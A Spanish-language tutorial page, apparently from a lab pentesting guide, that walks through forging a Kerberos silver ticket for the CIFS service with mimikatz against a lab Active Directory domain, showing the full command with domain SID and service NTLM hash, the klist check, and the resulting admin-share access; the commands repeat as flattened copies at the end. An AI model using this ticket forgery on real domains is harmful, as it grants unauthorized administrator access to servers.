Silver Ticket para CIFS

Primero vamos a ejecutar el siguiente comando desde WebServer:

C:\Users\adminwebserver>dir \\USER-SERVER.spartancybersec.corp\c$
Access is denied.

C:\Users\adminwebserver>hostname
WebServer

C:\Users\adminwebserver>whoami
spartancybersec\adminwebserver

C:\Users\adminwebserver>ipconfig

Windows IP Configuration
Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : spartancybersec.corp
   Link-local IPv6 Address . . . . . : fe80::3dce:ac79:a1b0:7820%14
   IPv4 Address. . . . . . . . . . . : 10.0.1.249
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1

En la evidencia previa, se puede apreciar que NO tenemos visibilidad contra el servidor USER-SERVER.spartancybersec.corp desde WEBSERVER.spartancybersec.corp

Vamos a generar un silver ticket para el servicio de CIFS y para ello es necesario:

SID del dominio
HASH NTLM DE USER-SERVER

El comando seria el siguiente:

C:\Users\Public\TOOLS>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /target:USER-SERVER.spartancybersec.corp /rc4:dadef894e564c991a5a5714e0a7efc67 /service:CIFS /ptt
User      : Administrator
Domain    : spartancybersec.corp (SPARTANCYBERSEC)
SID       : S-1-5-21-1861162130-2580302541-221646211
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: dadef894e564c991a5a5714e0a7efc67 - rc4_hmac_nt
Service   : CIFS
Target    : USER-SERVER.spartancybersec.corp
Lifetime  : 11/23/2023 7:14:27 PM ; 11/20/2033 7:14:27 PM ; 11/20/2033 7:14:27 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ spartancybersec.corp' successfully submitted for current session

mimikatz # exit
Bye!

Despues de lo anterior, podemos validar la existencia de nuestro ticket asi:

C:\Users\Public\TOOLS>klist

Current LogonId is 0:0xae5fb

Cached Tickets: (1)

#0>     Client: Administrator @ spartancybersec.corp
        Server: CIFS/USER-SERVER.spartancybersec.corp @ spartancybersec.corp
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 11/23/2023 19:14:27 (local)
        End Time:   11/20/2033 19:14:27 (local)
        Renew Time: 11/20/2033 19:14:27 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

Y como resultado final podremos realizar una interaccion exitosa:

C:\Users\Public\TOOLS>dir \\USER-SERVER.spartancybersec.corp\c$
 Volume in drive \\USER-SERVER.spartancybersec.corp\c$ has no label.
 Volume Serial Number is 4C79-B015

 Directory of \\USER-SERVER.spartancybersec.corp\c$

11/14/2018  06:56 AM    <DIR>          EFI
05/13/2020  05:58 PM    <DIR>          PerfLogs
09/24/2022  03:51 AM    <DIR>          Program Files
09/19/2022  11:44 PM    <DIR>          Program Files (x86)
11/23/2023  07:10 PM    <DIR>          Users
11/13/2023  09:11 AM    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  14,095,360,000 bytes free

AnteriorService Principal Name (SPN)SiguienteGolden Ticket

Última actualización hace 9 meses

¿Te fue útil?

C:\Users\adminwebserver>dir \\USER-SERVER.spartancybersec.corp\c$ Access is denied. C:\Users\adminwebserver>hostname WebServer C:\Users\adminwebserver>whoami spartancybersec\adminwebserver C:\Users\adminwebserver>ipconfig Windows IP Configuration Ethernet adapter Ethernet 2: Connection-specific DNS Suffix . : spartancybersec.corp Link-local IPv6 Address . . . . . : fe80::3dce:ac79:a1b0:7820%14 IPv4 Address. . . . . . . . . . . : 10.0.1.249 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.0.1.1

C:\Users\Public\TOOLS>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /target:USER-SERVER.spartancybersec.corp /rc4:dadef894e564c991a5a5714e0a7efc67 /service:CIFS /ptt User : Administrator Domain : spartancybersec.corp (SPARTANCYBERSEC) SID : S-1-5-21-1861162130-2580302541-221646211 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: dadef894e564c991a5a5714e0a7efc67 - rc4_hmac_nt Service : CIFS Target : USER-SERVER.spartancybersec.corp Lifetime : 11/23/2023 7:14:27 PM ; 11/20/2033 7:14:27 PM ; 11/20/2033 7:14:27 PM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'Administrator @ spartancybersec.corp' successfully submitted for current session mimikatz # exit Bye!

C:\Users\Public\TOOLS>klist Current LogonId is 0:0xae5fb Cached Tickets: (1) #0> Client: Administrator @ spartancybersec.corp Server: CIFS/USER-SERVER.spartancybersec.corp @ spartancybersec.corp KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40a00000 -> forwardable renewable pre_authent Start Time: 11/23/2023 19:14:27 (local) End Time: 11/20/2033 19:14:27 (local) Renew Time: 11/20/2033 19:14:27 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0 Kdc Called:

C:\Users\Public\TOOLS>dir \\USER-SERVER.spartancybersec.corp\c$ Volume in drive \\USER-SERVER.spartancybersec.corp\c$ has no label. Volume Serial Number is 4C79-B015 Directory of \\USER-SERVER.spartancybersec.corp\c$ 11/14/2018 06:56 AM <DIR> EFI 05/13/2020 05:58 PM <DIR> PerfLogs 09/24/2022 03:51 AM <DIR> Program Files 09/19/2022 11:44 PM <DIR> Program Files (x86) 11/23/2023 07:10 PM <DIR> Users 11/13/2023 09:11 AM <DIR> Windows 0 File(s) 0 bytes 6 Dir(s) 14,095,360,000 bytes free